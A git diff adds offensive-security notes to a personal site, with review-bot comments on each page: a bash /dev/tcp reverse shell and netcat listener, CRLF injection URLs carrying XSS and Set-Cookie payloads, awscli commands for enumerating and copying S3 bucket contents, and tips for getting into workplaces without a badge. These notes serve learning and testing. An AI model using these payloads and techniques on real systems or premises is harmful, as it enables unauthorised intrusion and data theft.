diff --git a/content/404.md b/content/404.md new file mode 100644 index 0000000..189bebf --- /dev/null +++ b/content/404.md @@ -0,0 +1,23 @@ +--- +title: "[Error 404](/)" +hidden: true +noindex: true +layout: page +--- + +Hi! Sorry but link doesn't exist yet. + +![](https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif) + + + +It may be still in work or not posted yet. + +If this link doesn't work for 1+ weeks, please contact me! + + + + + + + diff --git a/content/hacking/HowTo_Bash_reverseShell.md b/content/hacking/HowTo_Bash_reverseShell.md new file mode 100644 index 0000000..a4b98cf --- /dev/null +++ b/content/hacking/HowTo_Bash_reverseShell.md @@ -0,0 +1,9 @@ ++++ +title = 'HowTo Bash ReverseShell' +date = 2024-09-04 ++++ + +Listener - `nc -l 8081` +Reverse shell - `bash -i >& /dev/tcp//1337 0>&1` + +May not work on hardened systems/containers. diff --git a/content/hacking/HowTo_CRLF.md b/content/hacking/HowTo_CRLF.md new file mode 100644 index 0000000..771c07e --- /dev/null +++ b/content/hacking/HowTo_CRLF.md 
@@ -0,0 +1,26 @@ ++++ +title = 'HowTo CRLF' +date = 2024-09-18 ++++ + + +Mostly fixed thing! May occure in some handwritten web-servers + +CRLF - Carriege Return (\r) Line Feed (\n) (or %0d %0a) + + + +Inserting \r\n into URL allow attacker to: +- log splitting - to insert logs to server that may decieve administrator +- HTTP response slpitting - Allows to add HTTP headers to the HTTP response + - XSS - `www.target.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E` - disables XSS protection, set location to custom (but does it work without 302/201 status???), sets html content-type and injects javascript. + - cookie injection + - check another note + +For example: +`GET /%0d%0aSet-Cookie:CRLFInjection=PreritPathak HTTP/1.1` +Will add `Set-Cookie:CRLFInjection=PreritPathak` header to HTTP response + +{{< source >}} +https://www.geeksforgeeks.org/crlf-injection-attack/ +{{< /source >}} diff --git a/content/hacking/HowTo_S3.md b/content/hacking/HowTo_S3.md new file mode 100644 index 0000000..ada5df7 --- /dev/null +++ b/content/hacking/HowTo_S3.md 
@@ -0,0 +1,84 @@ ++++ +title = 'HowTo hack S3' +date = 2024-09-25 +draft = true ++++ + +TODO ME + +## What is S3? + +### Abstract + +S3 (Amazon Simple Storage Service) - object storage. You can think of it as cloud storage but designed for **storing and retrieving large files**. E.g. backups, archives, big data analytics, content distribution, and static website content. + +S3 can be selfhosted (but you probably shouldn't do it). In other cases, company probably will use Amazon's S3. + +S3 have "buckets" - container/folder for files. + +### Technical + +Interaction with S3 happens via RESTful API (`aws s3`). + +Each bucket have its own settings: + - Region - each bucket is created in specific AWS region (for performance) - e.g. `https://.s3..amazonaws.com/image.png` + - Name - each name should be unique across all AWS regions + - Storage class - how fast data can be accessed + - Lifecycle management - data can automatically be deleted or transfered to cheaper storage + - Versioning - S3 can keep snapshots of data + - Logging/monitoring + - Access control - the most interesting part for us. S3 have **public** and **private** buckets: + - In public bucket - any user can list content + - In private bucket - you should have credentials which have access to specific file + + +## Recon + +### Find bucket endpoint + +1. Try [Wappalyzer](https://www.wappalyzer.com/apps/) +2. [Spider](/hidden/todo/) site - `katana -js` +3. 
Search + +### Find credentials + +## Enumerate + +Automatically: +https://github.com/sa7mon/S3Scanner + +## Manually connect to S3 + +awscli: +``` +aws configure +*написать что либо, в идеале легальный логин и пароль* +aws --endpoint=http://s3.smth.com s3 ls # list buckets +aws --endpoint=http://s3.smth.com s3 ls s3://smth # list files +aws s3 ls s3://whateverbucketname +aws --endpoint=http://s3.smth.com s3 cp smth s3://smth # upload +aws s3 mv Exploit.txt s3://whateverbucketname/ +aws --endpoint=http://s3.smth.com s3 cp s3://smth # download +aws s3 cp s3://whateverbucketname/secret.txt +``` + + +## Resources + + - https://buckets.grayhatwarfare.com, a list with already discovered open buckets. + +## Train + + - http://flaws.cloud/ + + - http://flaws2.cloud/ + +{{< source >}} +https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#looking-for-vulnerabilities-2 +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#s3-buckets +https://freedium.cfd/https//medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Finfosecwriteups.com%2Ffinding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4 +{{< /source >}} diff --git a/content/hacking/HowTo_learn_SocialEngineering.md b/content/hacking/HowTo_learn_SocialEngineering.md new file mode 100644 index 0000000..f13b93d --- /dev/null +++ b/content/hacking/HowTo_learn_SocialEngineering.md 
@@ -0,0 +1,32 @@ ++++ +title = 'HowTo learn Social Engineering' +date = 2024-09-11 ++++ + + + +Social Engineering - its **Social** skills + Events **Engineering** + +How to learn Social Engineering: + - Create new __Identity__ - "Today I will be Jack the electrician" + - Just start interact with **all** people + - Don't start speaking with same route: "Hello, I'm Jack, Who are you", do it differently every time + - Go pick up girls ~~and touch grass~~ + - Especially speak with people you are uncomfortable with + - You need to have uncomfortable situations to master you being in stressful situations + - If they invite you to something weird that you usually don't want to do - Do it + - If you have to present something as a proof of your belonging in place where you shouldn't be - Don't show it. + + +Make your work office - penetretion testing lab + - Is there bage required? - Do not wear it and make some excuse. Talk your way out + + +Books for Social skill: + - "Built for Growth" - Chris Kuenne, + - "Coaching Habit" - Michael Stanier Bungay + + +{{< source >}} +https://www.youtube.com/watch?v=CldNso156QY +{{< /source >}}
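Review bot: in content/404.md the `title` front-matter field holds a markdown link (`"[Error 404](/)"`), which will be printed verbatim in the browser tab and in any template that emits the title as plain text; use a plain `title: "Error 404"` and put the link home in the page body. The page also hotlinks a GIF from media1.tenor.com, so every visitor who lands on a broken link makes a request to a third party (sending referrer and client IP) and the error page degrades if that URL ever disappears; copy the image into the site's static assets instead. Wording: "Sorry but link doesn't exist yet" reads better as "Sorry, but this link doesn't exist yet", and "It may be still in work" as "It may still be in progress". The run of empty lines at the end of the file can be dropped.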
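Review bot: in content/hacking/HowTo_Bash_reverseShell.md the listener and the shell disagree on the port (`nc -l 8081` versus `/dev/tcp//1337`), and the host component of the `/dev/tcp/` path is empty, most likely because an angle-bracket placeholder was swallowed as an HTML tag when the markdown rendered; use one port in both commands and an escaped placeholder such as `HOST` inside the code span so the rendered page shows it. The closing line "May not work on hardened systems/containers" would be more useful with the reason: `/dev/tcp` is a bash feature that some builds compile out, and egress filtering on the host or network blocks the outbound connection entirely, which is why that filtering (and alerting on shells with a network socket as stdin/stdout) is the defence a hardened environment relies on.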
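Review bot: in content/hacking/HowTo_CRLF.md the XSS bullet ships an unanswered question in the page text ("but does it work without 302/201 status???"); either answer it (browsers act on `Location` only for 3xx responses, so on a 200 the injected header is ignored and only the body part matters) or mark it as a TODO, and the bullet "check another note" links to nothing, so link the cookie-injection note or remove the bullet. The page describes the attack but not the fix: add one line that the defence is to reject, or strip, CR and LF (and their `%0d`/`%0a` encodings) from any user-controlled value before it is written into a response header or a log line, which is what current servers and frameworks do and is the reason the page can open with "Mostly fixed". Spelling: "occure" should be "occur", "Carriege" should be "Carriage", "slpitting" should be "splitting", "decieve" should be "deceive".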
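Review bot: in content/hacking/HowTo_S3.md the `awscli` block contains a Russian line (`*написать что либо, в идеале легальный логин и пароль*`, meaning "enter anything, ideally a legitimate login and password") inside an otherwise English page, and the fence has no language tag; turn the line into an English shell comment and tag the fence `bash`. The "Access control" bullets conflate two permissions that AWS grants independently: listing a bucket (`s3:ListBucket`) and reading an object (`s3:GetObject`), so a bucket can serve readable objects without being listable and vice versa; stating that makes both "public" and what an owner has to lock down precise. The region URL example has lost its placeholders (`https://.s3..amazonaws.com/image.png`), again angle brackets eaten as HTML, so escape them, and the command list mixes `--endpoint=http://s3.smth.com` and plain `aws s3` invocations without saying that the endpoint form is for S3-compatible, self-hosted services and the plain form targets AWS itself.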
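Review bot: in content/hacking/HowTo_learn_SocialEngineering.md the book list has an author's name out of order and another left incomplete: "The Coaching Habit" is by Michael Bungay Stanier, and "Built for Growth" is co-authored by Chris Kuenne and John Danner (the trailing comma after Kuenne suggests the second name was meant to follow). The opening definition "its **Social** skills + Events **Engineering**" is hard to parse; something like "social skills applied to engineering events" says what was meant. Spelling and grammar: "penetretion" should be "penetration", "bage" should be "badge", "its" should be "is", "to master you being in stressful situations" reads better as "to get used to being in stressful situations", and "Just start interact" should be "Just start interacting".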